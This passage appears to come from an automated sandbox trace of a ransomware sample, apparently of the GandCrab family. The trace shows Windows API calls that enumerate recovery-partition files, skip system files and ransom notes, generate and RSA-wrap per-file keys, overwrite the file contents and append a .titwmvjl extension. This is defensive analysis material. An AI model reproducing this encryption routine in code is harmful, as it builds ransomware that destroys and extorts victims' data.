returned 0x77550000 [0067.764] CryptEncrypt (in: hKey=0x4ca178, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2610000*, pdwDataLen=0x259f658*=0xc8, dwBufLen=0x100 | out: pbData=0x2610000*, pdwDataLen=0x259f658*=0x100) returned 1 [0067.764] GetLastError () returned 0x0 [0067.764] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.764] CryptDestroyKey (hKey=0x4ca178) returned 1 [0067.764] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.764] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0067.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.765] CryptAcquireContextW (in: phProv=0x259f628, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f628*=0x4c9980) returned 1 [0067.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.765] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f62c | out: phKey=0x259f62c*=0x4c9c78) returned 1 [0067.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.765] CryptGetKeyParam (in: hKey=0x4c9c78, dwParam=0x8, pbData=0x259f620, pdwDataLen=0x259f624, dwFlags=0x0 | out: pbData=0x259f620*=0x800, pdwDataLen=0x259f624*=0x4) returned 1 [0067.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.765] CryptEncrypt (in: hKey=0x4c9c78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2610100*, pdwDataLen=0x259f658*=0xc8, dwBufLen=0x100 | out: pbData=0x2610100*, pdwDataLen=0x259f658*=0x100) returned 1 [0067.766] GetLastError () returned 0x0 [0067.766] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.766] CryptDestroyKey (hKey=0x4c9c78) returned 1 [0067.766] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0067.766] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0067.766] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2620000 [0067.766] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2730000 [0067.766] ReadFile (in: hFile=0x230, lpBuffer=0x2620000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f704, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x259f704*=0x100000, lpOverlapped=0x0) returned 1 [0067.930] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.930] WriteFile (in: hFile=0x230, lpBuffer=0x2730000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x259f6e8, lpOverlapped=0x0 | out: lpBuffer=0x2730000*, lpNumberOfBytesWritten=0x259f6e8*=0x100000, lpOverlapped=0x0) returned 1 [0067.937] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.937] WriteFile (in: hFile=0x230, lpBuffer=0x2610000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f6e8, lpOverlapped=0x0 | out: lpBuffer=0x2610000*, lpNumberOfBytesWritten=0x259f6e8*=0x21c, lpOverlapped=0x0) returned 1 [0067.939] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.943] VirtualFree (lpAddress=0x2730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.947] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.947] CloseHandle (hObject=0x230) returned 1 [0068.013] MoveFileExW (lpExistingFileName="C:\\Recovery\\WindowsRE\\boot.sdi" (normalized: "c:\\recovery\\windowsre\\boot.sdi"), lpNewFileName="C:\\Recovery\\WindowsRE\\boot.sdi.titwmvjl" (normalized: "c:\\recovery\\windowsre\\boot.sdi.titwmvjl"), dwFlags=0x1) returned 1 [0068.014] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.014] FindNextFileW (in: hFindFile=0x4ca078, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0068.014] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0068.014] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0068.014] lstrcatW (in: lpString1="C:\\Recovery\\WindowsRE\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Recovery\\WindowsRE\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Recovery\\WindowsRE\\d2ca4a09d2ca4deb61a.lock" [0068.014] lstrlenW (lpString=".titwmvjl") returned 9 [0068.014] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\d2ca4a09d2ca4deb61a.lock") returned 46 [0068.014] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0068.015] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Recovery\\WindowsRE\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 55 [0068.015] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\d2ca4a09d2ca4deb61a.lock") returned 46 [0068.015] lstrlenW (lpString=".lock") returned 5 [0068.015] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0068.015] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".lock ") returned 6 [0068.015] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.015] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.015] FindNextFileW (in: hFindFile=0x4ca078, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0068.015] lstrcmpW (lpString1="ReAgent.xml", lpString2=".") returned 1 [0068.015] lstrcmpW (lpString1="ReAgent.xml", lpString2="..") returned 1 [0068.016] lstrcatW (in: lpString1="C:\\Recovery\\WindowsRE\\", lpString2="ReAgent.xml" | out: lpString1="C:\\Recovery\\WindowsRE\\ReAgent.xml") returned="C:\\Recovery\\WindowsRE\\ReAgent.xml" [0068.016] lstrlenW (lpString=".titwmvjl") returned 9 [0068.016] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\ReAgent.xml") returned 33 [0068.016] VirtualAlloc (lpAddress=0x0, dwSize=0x82, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0068.016] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Recovery\\WindowsRE\\ReAgent.xml.titwmvjl") returned 42 [0068.016] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\ReAgent.xml") returned 33 [0068.016] lstrlenW (lpString=".xml") returned 4 [0068.016] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0068.016] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".xml ") returned 5 [0068.016] lstrcmpiW (lpString1=".xml", lpString2=".titwmvjl") returned 1 [0068.016] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.016] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\ReAgent.xml") returned 33 [0068.016] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\ReAgent.xml") returned 33 [0068.016] lstrcmpiW (lpString1="ReAgent.xml", lpString2="desktop.ini") returned 1 [0068.016] lstrcmpiW (lpString1="ReAgent.xml", lpString2="autorun.inf") returned 1 [0068.016] lstrcmpiW (lpString1="ReAgent.xml", lpString2="ntuser.dat") returned 1 [0068.016] lstrcmpiW (lpString1="ReAgent.xml", lpString2="iconcache.db") returned 1 [0068.016] lstrcmpiW (lpString1="ReAgent.xml", lpString2="bootsect.bak") returned 1 [0068.017] lstrcmpiW (lpString1="ReAgent.xml", lpString2="boot.ini") returned 1 [0068.017] lstrcmpiW (lpString1="ReAgent.xml", lpString2="ntuser.dat.log") returned 1 [0068.017] lstrcmpiW (lpString1="ReAgent.xml", lpString2="thumbs.db") returned -1 [0068.017] lstrcmpiW (lpString1="ReAgent.xml", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0068.017] lstrcmpiW (lpString1="ReAgent.xml", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0068.017] lstrcmpiW (lpString1="ReAgent.xml", lpString2="KRAB-DECRYPT.html") returned 1 [0068.017] lstrcmpiW (lpString1="ReAgent.xml", lpString2="CRAB-DECRYPT.html") returned 1 [0068.017] lstrcmpiW (lpString1="ReAgent.xml", lpString2="KRAB-DECRYPT.txt") returned 1 [0068.017] lstrcmpiW (lpString1="ReAgent.xml", lpString2="CRAB-DECRYPT.txt") returned 1 [0068.017] lstrcmpiW (lpString1="ReAgent.xml", lpString2="ntldr") returned 1 [0068.017] lstrcmpiW (lpString1="ReAgent.xml", lpString2="NTDETECT.COM") returned 1 [0068.017] lstrcmpiW (lpString1="ReAgent.xml", lpString2="Bootfont.bin") returned 1 [0068.017] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\ReAgent.xml") returned 33 [0068.017] lstrlenW (lpString=".xml") returned 4 [0068.017] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0068.017] wsprintfW (in: param_1=0x2610000, param_2="%s " | out: param_1=".xml ") returned 5 [0068.017] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.017] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0068.017] CreateFileW (lpFileName="C:\\Recovery\\WindowsRE\\ReAgent.xml" (normalized: "c:\\recovery\\windowsre\\reagent.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x230 [0068.018] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.018] ReadFile (in: hFile=0x230, lpBuffer=0x2610000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f704, lpOverlapped=0x0 | out: lpBuffer=0x2610000*, lpNumberOfBytesRead=0x259f704*=0x21c, lpOverlapped=0x0) returned 1 [0068.042] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.043] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.043] CryptAcquireContextW (in: phProv=0x259f634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f634*=0x4c9a20) returned 1 [0068.043] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2620000 [0068.043] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0068.044] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0068.044] CryptGenRandom (in: hProv=0x4c9a20, dwLen=0x20, pbBuffer=0x259f6c0 | out: pbBuffer=0x259f6c0) returned 1 [0068.044] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.044] CryptReleaseContext (hProv=0x4c9a20, dwFlags=0x0) returned 1 [0068.044] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.044] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.044] CryptAcquireContextW (in: phProv=0x259f634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f634*=0x4c9a20) returned 1 [0068.044] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2620000 [0068.045] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0068.045] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0068.045] CryptGenRandom (in: hProv=0x4c9a20, dwLen=0x8, pbBuffer=0x259f6e0 | out: pbBuffer=0x259f6e0) returned 1 [0068.045] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.045] CryptReleaseContext (hProv=0x4c9a20, dwFlags=0x0) returned 1 [0068.045] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.045] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.045] CryptAcquireContextW (in: phProv=0x259f628, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f628*=0x4c9a20) returned 1 [0068.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.046] CryptImportKey (in: hProv=0x4c9a20, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f62c | out: phKey=0x259f62c*=0x4c9d38) returned 1 [0068.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.046] CryptGetKeyParam (in: hKey=0x4c9d38, dwParam=0x8, pbData=0x259f620, pdwDataLen=0x259f624, dwFlags=0x0 | out: pbData=0x259f620*=0x800, pdwDataLen=0x259f624*=0x4) returned 1 [0068.046] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.046] CryptEncrypt (in: hKey=0x4c9d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2610000*, pdwDataLen=0x259f658*=0xc8, dwBufLen=0x100 | out: pbData=0x2610000*, pdwDataLen=0x259f658*=0x100) returned 1 [0068.047] GetLastError () returned 0x0 [0068.047] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.047] CryptDestroyKey (hKey=0x4c9d38) returned 1 [0068.047] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.047] CryptReleaseContext (hProv=0x4c9a20, dwFlags=0x0) returned 1 [0068.047] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.047] CryptAcquireContextW (in: phProv=0x259f628, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f628*=0x4c9a20) returned 1 [0068.047] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.048] CryptImportKey (in: hProv=0x4c9a20, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f62c | out: phKey=0x259f62c*=0x4ca0b8) returned 1 [0068.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.048] CryptGetKeyParam (in: hKey=0x4ca0b8, dwParam=0x8, pbData=0x259f620, pdwDataLen=0x259f624, dwFlags=0x0 | out: pbData=0x259f620*=0x800, pdwDataLen=0x259f624*=0x4) returned 1 [0068.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.048] CryptEncrypt (in: hKey=0x4ca0b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2610100*, pdwDataLen=0x259f658*=0xc8, dwBufLen=0x100 | out: pbData=0x2610100*, pdwDataLen=0x259f658*=0x100) returned 1 [0068.048] GetLastError () returned 0x0 [0068.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.048] CryptDestroyKey (hKey=0x4ca0b8) returned 1 [0068.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.049] CryptReleaseContext (hProv=0x4c9a20, dwFlags=0x0) returned 1 [0068.049] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2620000 [0068.049] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2730000 [0068.049] ReadFile (in: hFile=0x230, lpBuffer=0x2620000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f704, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x259f704*=0x411, lpOverlapped=0x0) returned 1 [0068.054] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xfffffbef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.054] WriteFile (in: hFile=0x230, lpBuffer=0x2730000*, nNumberOfBytesToWrite=0x411, lpNumberOfBytesWritten=0x259f6e8, lpOverlapped=0x0 | out: lpBuffer=0x2730000*, lpNumberOfBytesWritten=0x259f6e8*=0x411, lpOverlapped=0x0) returned 1 [0068.173] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.173] WriteFile (in: hFile=0x230, lpBuffer=0x2610000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f6e8, lpOverlapped=0x0 | out: lpBuffer=0x2610000*, lpNumberOfBytesWritten=0x259f6e8*=0x21c, lpOverlapped=0x0) returned 1 [0068.175] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.178] VirtualFree (lpAddress=0x2730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.178] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.178] CloseHandle (hObject=0x230) returned 1 [0068.180] MoveFileExW (lpExistingFileName="C:\\Recovery\\WindowsRE\\ReAgent.xml" (normalized: "c:\\recovery\\windowsre\\reagent.xml"), lpNewFileName="C:\\Recovery\\WindowsRE\\ReAgent.xml.titwmvjl" (normalized: "c:\\recovery\\windowsre\\reagent.xml.titwmvjl"), dwFlags=0x1) returned 1 [0068.180] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.180] FindNextFileW (in: hFindFile=0x4ca078, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0068.180] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0068.180] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0068.180] lstrcatW (in: lpString1="C:\\Recovery\\WindowsRE\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Recovery\\WindowsRE\\TITWMVJL-DECRYPT.txt") returned="C:\\Recovery\\WindowsRE\\TITWMVJL-DECRYPT.txt" [0068.180] lstrlenW (lpString=".titwmvjl") returned 9 [0068.180] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\TITWMVJL-DECRYPT.txt") returned 42 [0068.181] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0068.181] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Recovery\\WindowsRE\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 51 [0068.181] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\TITWMVJL-DECRYPT.txt") returned 42 [0068.181] lstrlenW (lpString=".txt") returned 4 [0068.181] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0068.181] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".txt ") returned 5 [0068.181] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0068.181] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.181] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\TITWMVJL-DECRYPT.txt") returned 42 [0068.181] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\TITWMVJL-DECRYPT.txt") returned 42 [0068.181] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0068.181] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0068.181] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0068.181] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0068.181] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0068.181] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0068.181] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0068.181] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0068.181] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.182] FindNextFileW (in: hFindFile=0x4ca078, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0068.182] lstrcmpW (lpString1="Winre.wim", lpString2=".") returned 1 [0068.182] lstrcmpW (lpString1="Winre.wim", lpString2="..") returned 1 [0068.182] lstrcatW (in: lpString1="C:\\Recovery\\WindowsRE\\", lpString2="Winre.wim" | out: lpString1="C:\\Recovery\\WindowsRE\\Winre.wim") returned="C:\\Recovery\\WindowsRE\\Winre.wim" [0068.182] lstrlenW (lpString=".titwmvjl") returned 9 [0068.182] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\Winre.wim") returned 31 [0068.182] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0068.182] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Recovery\\WindowsRE\\Winre.wim.titwmvjl") returned 40 [0068.182] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\Winre.wim") returned 31 [0068.182] lstrlenW (lpString=".wim") returned 4 [0068.182] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0068.182] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".wim ") returned 5 [0068.182] lstrcmpiW (lpString1=".wim", lpString2=".titwmvjl") returned 1 [0068.182] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.182] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\Winre.wim") returned 31 [0068.182] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\Winre.wim") returned 31 [0068.182] lstrcmpiW (lpString1="Winre.wim", lpString2="desktop.ini") returned 1 [0068.182] lstrcmpiW (lpString1="Winre.wim", lpString2="autorun.inf") returned 1 [0068.182] lstrcmpiW (lpString1="Winre.wim", lpString2="ntuser.dat") returned 1 [0068.182] lstrcmpiW (lpString1="Winre.wim", lpString2="iconcache.db") returned 1 [0068.182] lstrcmpiW (lpString1="Winre.wim", lpString2="bootsect.bak") returned 1 [0068.183] lstrcmpiW (lpString1="Winre.wim", lpString2="boot.ini") returned 1 [0068.183] lstrcmpiW (lpString1="Winre.wim", lpString2="ntuser.dat.log") returned 1 [0068.183] lstrcmpiW (lpString1="Winre.wim", lpString2="thumbs.db") returned 1 [0068.183] lstrcmpiW (lpString1="Winre.wim", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0068.183] lstrcmpiW (lpString1="Winre.wim", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0068.183] lstrcmpiW (lpString1="Winre.wim", lpString2="KRAB-DECRYPT.html") returned 1 [0068.183] lstrcmpiW (lpString1="Winre.wim", lpString2="CRAB-DECRYPT.html") returned 1 [0068.183] lstrcmpiW (lpString1="Winre.wim", lpString2="KRAB-DECRYPT.txt") returned 1 [0068.183] lstrcmpiW (lpString1="Winre.wim", lpString2="CRAB-DECRYPT.txt") returned 1 [0068.183] lstrcmpiW (lpString1="Winre.wim", lpString2="ntldr") returned 1 [0068.183] lstrcmpiW (lpString1="Winre.wim", lpString2="NTDETECT.COM") returned 1 [0068.183] lstrcmpiW (lpString1="Winre.wim", lpString2="Bootfont.bin") returned 1 [0068.183] lstrlenW (lpString="C:\\Recovery\\WindowsRE\\Winre.wim") returned 31 [0068.183] lstrlenW (lpString=".wim") returned 4 [0068.183] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0068.183] wsprintfW (in: param_1=0x2610000, param_2="%s " | out: param_1=".wim ") returned 5 [0068.183] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.183] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0068.183] CreateFileW (lpFileName="C:\\Recovery\\WindowsRE\\Winre.wim" (normalized: "c:\\recovery\\windowsre\\winre.wim"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x230 [0068.184] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.184] ReadFile (in: hFile=0x230, lpBuffer=0x2610000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f704, lpOverlapped=0x0 | out: lpBuffer=0x2610000*, lpNumberOfBytesRead=0x259f704*=0x21c, lpOverlapped=0x0) returned 1 [0068.268] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.268] CryptAcquireContextW (in: phProv=0x259f634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f634*=0x4c9aa8) returned 1 [0068.269] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2630000 [0068.269] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0068.269] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0068.269] CryptGenRandom (in: hProv=0x4c9aa8, dwLen=0x20, pbBuffer=0x259f6c0 | out: pbBuffer=0x259f6c0) returned 1 [0068.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.269] CryptReleaseContext (hProv=0x4c9aa8, dwFlags=0x0) returned 1 [0068.269] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.270] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.270] CryptAcquireContextW (in: phProv=0x259f634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f634*=0x4c9aa8) returned 1 [0068.270] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2630000 [0068.270] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0068.270] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0068.270] CryptGenRandom (in: hProv=0x4c9aa8, dwLen=0x8, pbBuffer=0x259f6e0 | out: pbBuffer=0x259f6e0) returned 1 [0068.270] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.271] CryptReleaseContext (hProv=0x4c9aa8, dwFlags=0x0) returned 1 [0068.271] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.271] CryptAcquireContextW (in: phProv=0x259f628, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f628*=0x4c9aa8) returned 1 [0068.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.271] CryptImportKey (in: hProv=0x4c9aa8, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f62c | out: phKey=0x259f62c*=0x4ca0b8) returned 1 [0068.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.272] CryptGetKeyParam (in: hKey=0x4ca0b8, dwParam=0x8, pbData=0x259f620, pdwDataLen=0x259f624, dwFlags=0x0 | out: pbData=0x259f620*=0x800, pdwDataLen=0x259f624*=0x4) returned 1 [0068.272] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0068.272] CryptEncrypt (in: hKey=0x4ca0b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2610000*, pdwDataLen=0x259f658*=0xc8, dwBufLen=0x100 | out: pbData=0x2610000*, 